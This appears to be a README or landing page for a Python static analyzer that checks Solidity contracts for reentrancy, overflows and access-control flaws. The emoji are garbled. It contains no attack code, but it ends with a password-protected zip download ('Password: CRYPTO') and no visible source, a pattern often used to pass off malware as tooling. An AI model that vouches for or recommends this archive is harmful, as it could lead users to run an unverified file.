An open-source tool to analyze Ethereum smart contracts for common security vulnerabilities and code quality issues. Ideal for developers, auditors, and blockchain enthusiasts who want to ensure their Solidity code is safe and efficient.
-
π‘οΈ Static Security Analysis
Detect common vulnerabilities like:- Reentrancy
- Integer overflows/underflows
- Unchecked call return values
- Unprotected
selfdestruct - Unrestricted access control
-
π§ Code Quality Hints
Suggest best practices based on Solidity style guide. -
π Dependency & Import Scanner
Track and analyze third-party contracts and libraries. -
π§ͺ Integration with Slither (optional)
Extendable with Slither for deeper analysis. -
π Readable Report Output
JSON, HTML, and terminal-based reports.
- Language: Python 3.10+
- Libraries:
slither-analyzer,py-solc-x,rich,click - Optional: Docker support for isolated analysis environment
π Download Analyzer Tool.zip
π Password: CRYPTO